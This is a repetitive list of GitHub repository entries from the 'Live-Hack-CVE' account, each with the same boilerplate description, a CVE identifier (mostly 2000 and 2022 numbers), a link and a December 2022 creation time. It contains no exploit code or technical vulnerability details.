**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35671 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35671](https://github.com/Live-Hack-CVE/CVE-2022-35671) create time: 2022-12-26T17:44:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35670 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35670](https://github.com/Live-Hack-CVE/CVE-2022-35670) create time: 2022-12-26T17:44:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35665 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35665](https://github.com/Live-Hack-CVE/CVE-2022-35665) create time: 2022-12-26T17:44:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35667 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35667](https://github.com/Live-Hack-CVE/CVE-2022-35667) create time: 2022-12-26T17:44:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35666 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35666](https://github.com/Live-Hack-CVE/CVE-2022-35666) create time: 2022-12-26T17:44:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-33994 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-33994](https://github.com/Live-Hack-CVE/CVE-2022-33994) create time: 2022-12-26T17:44:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28636 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28636](https://github.com/Live-Hack-CVE/CVE-2022-28636) create time: 2022-12-26T17:44:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28635 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28635](https://github.com/Live-Hack-CVE/CVE-2022-28635) create time: 2022-12-26T17:44:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28634 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28634](https://github.com/Live-Hack-CVE/CVE-2022-28634) create time: 2022-12-26T17:43:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20282 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20282](https://github.com/Live-Hack-CVE/CVE-2022-20282) create time: 2022-12-26T17:43:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20288 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20288](https://github.com/Live-Hack-CVE/CVE-2022-20288) create time: 2022-12-26T17:43:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28633 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28633](https://github.com/Live-Hack-CVE/CVE-2022-28633) create time: 2022-12-26T17:43:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28632 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28632](https://github.com/Live-Hack-CVE/CVE-2022-28632) create time: 2022-12-26T17:43:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28631 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28631](https://github.com/Live-Hack-CVE/CVE-2022-28631) create time: 2022-12-26T17:43:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28630 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28630](https://github.com/Live-Hack-CVE/CVE-2022-28630) create time: 2022-12-26T17:43:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28629 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28629](https://github.com/Live-Hack-CVE/CVE-2022-28629) create time: 2022-12-26T17:43:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28628 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28628](https://github.com/Live-Hack-CVE/CVE-2022-28628) create time: 2022-12-26T17:43:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28627 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28627](https://github.com/Live-Hack-CVE/CVE-2022-28627) create time: 2022-12-26T17:43:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-28626 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-28626](https://github.com/Live-Hack-CVE/CVE-2022-28626) create time: 2022-12-26T17:43:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35555 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35555](https://github.com/Live-Hack-CVE/CVE-2022-35555) create time: 2022-12-26T17:43:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35558 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35558](https://github.com/Live-Hack-CVE/CVE-2022-35558) create time: 2022-12-26T17:43:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35557 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35557](https://github.com/Live-Hack-CVE/CVE-2022-35557) create time: 2022-12-26T17:42:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35559 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35559](https://github.com/Live-Hack-CVE/CVE-2022-35559) create time: 2022-12-26T17:42:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35561 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35561](https://github.com/Live-Hack-CVE/CVE-2022-35561) create time: 2022-12-26T17:42:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35560 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35560](https://github.com/Live-Hack-CVE/CVE-2022-35560) create time: 2022-12-26T17:42:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0115 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0115](https://github.com/Live-Hack-CVE/CVE-2000-0115) create time: 2022-12-26T17:07:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0017 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0017](https://github.com/Live-Hack-CVE/CVE-2000-0017) create time: 2022-12-26T17:04:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2001-0352 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2001-0352](https://github.com/Live-Hack-CVE/CVE-2001-0352) create time: 2022-12-26T17:05:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35623 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35623](https://github.com/Live-Hack-CVE/CVE-2022-35623) create time: 2022-12-26T17:07:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-32148 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-32148](https://github.com/Live-Hack-CVE/CVE-2022-32148) create time: 2022-12-26T17:07:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0034 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0034](https://github.com/Live-Hack-CVE/CVE-2000-0034) create time: 2022-12-26T15:42:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0093 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0093](https://github.com/Live-Hack-CVE/CVE-2000-0093) create time: 2022-12-26T15:42:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0069 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0069](https://github.com/Live-Hack-CVE/CVE-2000-0069) create time: 2022-12-26T15:41:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0074 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0074](https://github.com/Live-Hack-CVE/CVE-2000-0074) create time: 2022-12-26T15:41:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0145 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0145](https://github.com/Live-Hack-CVE/CVE-2000-0145) create time: 2022-12-26T15:41:50Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0103 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0103](https://github.com/Live-Hack-CVE/CVE-2000-0103) create time: 2022-12-26T15:41:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0136 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0136](https://github.com/Live-Hack-CVE/CVE-2000-0136) create time: 2022-12-26T15:41:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0106 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0106](https://github.com/Live-Hack-CVE/CVE-2000-0106) create time: 2022-12-26T15:40:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0220 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0220](https://github.com/Live-Hack-CVE/CVE-2000-0220) create time: 2022-12-26T15:40:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0067 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0067](https://github.com/Live-Hack-CVE/CVE-2000-0067) create time: 2022-12-26T15:40:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0104 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0104](https://github.com/Live-Hack-CVE/CVE-2000-0104) create time: 2022-12-26T15:40:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0084 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0084](https://github.com/Live-Hack-CVE/CVE-2000-0084) create time: 2022-12-26T15:39:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0108 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0108](https://github.com/Live-Hack-CVE/CVE-2000-0108) create time: 2022-12-26T15:39:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0110 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0110](https://github.com/Live-Hack-CVE/CVE-2000-0110) create time: 2022-12-26T15:38:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0123 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0123](https://github.com/Live-Hack-CVE/CVE-2000-0123) create time: 2022-12-26T15:38:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0085 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0085](https://github.com/Live-Hack-CVE/CVE-2000-0085) create time: 2022-12-26T15:38:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0047 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0047](https://github.com/Live-Hack-CVE/CVE-2000-0047) create time: 2022-12-26T15:38:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0031 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0031](https://github.com/Live-Hack-CVE/CVE-2000-0031) create time: 2022-12-26T15:38:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0137 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0137](https://github.com/Live-Hack-CVE/CVE-2000-0137) create time: 2022-12-26T15:37:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0182 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0182](https://github.com/Live-Hack-CVE/CVE-2000-0182) create time: 2022-12-26T15:37:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0066 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0066](https://github.com/Live-Hack-CVE/CVE-2000-0066) create time: 2022-12-26T15:37:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0038 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0038](https://github.com/Live-Hack-CVE/CVE-2000-0038) create time: 2022-12-26T15:37:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0010 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0010](https://github.com/Live-Hack-CVE/CVE-2000-0010) create time: 2022-12-26T15:36:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0126 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0126](https://github.com/Live-Hack-CVE/CVE-2000-0126) create time: 2022-12-26T15:36:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0135 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0135](https://github.com/Live-Hack-CVE/CVE-2000-0135) create time: 2022-12-26T15:36:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0081 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0081](https://github.com/Live-Hack-CVE/CVE-2000-0081) create time: 2022-12-26T15:36:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0109 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0109](https://github.com/Live-Hack-CVE/CVE-2000-0109) create time: 2022-12-26T15:36:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0028 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0028](https://github.com/Live-Hack-CVE/CVE-2000-0028) create time: 2022-12-26T15:35:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0134 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0134](https://github.com/Live-Hack-CVE/CVE-2000-0134) create time: 2022-12-26T15:35:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0065 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0065](https://github.com/Live-Hack-CVE/CVE-2000-0065) create time: 2022-12-26T15:34:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2003-0742 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2003-0742](https://github.com/Live-Hack-CVE/CVE-2003-0742) create time: 2022-12-26T15:38:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2003-0769 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2003-0769](https://github.com/Live-Hack-CVE/CVE-2003-0769) create time: 2022-12-26T15:37:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2003-0658 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2003-0658](https://github.com/Live-Hack-CVE/CVE-2003-0658) create time: 2022-12-26T15:36:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0019 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0019](https://github.com/Live-Hack-CVE/CVE-2000-0019) create time: 2022-12-26T15:03:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0129 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0129](https://github.com/Live-Hack-CVE/CVE-2000-0129) create time: 2022-12-26T15:03:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0101 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0101](https://github.com/Live-Hack-CVE/CVE-2000-0101) create time: 2022-12-26T15:03:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0008 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0008](https://github.com/Live-Hack-CVE/CVE-2000-0008) create time: 2022-12-26T15:03:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0143 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0143](https://github.com/Live-Hack-CVE/CVE-2000-0143) create time: 2022-12-26T15:02:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0102 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0102](https://github.com/Live-Hack-CVE/CVE-2000-0102) create time: 2022-12-26T15:02:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0114 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0114](https://github.com/Live-Hack-CVE/CVE-2000-0114) create time: 2022-12-26T15:02:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0142 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0142](https://github.com/Live-Hack-CVE/CVE-2000-0142) create time: 2022-12-26T15:02:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2000-0020 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2000-0020](https://github.com/Live-Hack-CVE/CVE-2000-0020) create time: 2022-12-26T15:01:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-14611 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-14611](https://github.com/Live-Hack-CVE/CVE-2017-14611) create time: 2022-12-26T14:17:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-10728 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-10728](https://github.com/Live-Hack-CVE/CVE-2020-10728) create time: 2022-12-26T14:55:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14320 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14320](https://github.com/Live-Hack-CVE/CVE-2020-14320) create time: 2022-12-26T14:55:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1755 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1755](https://github.com/Live-Hack-CVE/CVE-2020-1755) create time: 2022-12-26T14:55:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14379 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14379](https://github.com/Live-Hack-CVE/CVE-2020-14379) create time: 2022-12-26T14:55:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-1756 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-1756](https://github.com/Live-Hack-CVE/CVE-2020-1756) create time: 2022-12-26T14:55:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33235 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33235](https://github.com/Live-Hack-CVE/CVE-2021-33235) create time: 2022-12-26T15:00:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33236 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33236](https://github.com/Live-Hack-CVE/CVE-2021-33236) create time: 2022-12-26T15:00:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39035 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39035](https://github.com/Live-Hack-CVE/CVE-2021-39035) create time: 2022-12-26T14:57:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39085 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39085](https://github.com/Live-Hack-CVE/CVE-2021-39085) create time: 2022-12-26T14:57:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39087 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39087](https://github.com/Live-Hack-CVE/CVE-2021-39087) create time: 2022-12-26T14:57:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39086 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39086](https://github.com/Live-Hack-CVE/CVE-2021-39086) create time: 2022-12-26T14:56:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30490 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30490](https://github.com/Live-Hack-CVE/CVE-2021-30490) create time: 2022-12-26T14:54:13Z

